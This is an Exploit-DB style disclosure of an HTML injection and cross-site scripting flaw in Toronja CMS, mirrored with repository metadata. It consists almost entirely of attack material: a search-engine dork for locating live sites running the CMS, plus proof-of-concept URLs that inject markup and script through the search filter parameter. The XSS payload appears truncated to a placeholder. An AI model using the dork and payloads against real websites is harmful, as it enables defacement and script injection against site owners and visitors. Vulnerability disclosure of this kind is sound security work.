exploit-db-mirror/platforms/php/webapps/12771.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

25 lines
870 B
Text
Executable file

-------------------------------------------------------------------------------------------
Toronja Cms HTML/XSS Injection Vulnerability
-------------------------------------------------------------------------------------------
Author : CoBRa_21
Script Home : http://www.toronja.com.pe/
Dork : intext:"sitio web diseñado por www.toronja.com.pe"
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS
-------------------------------------------------------------------------------------------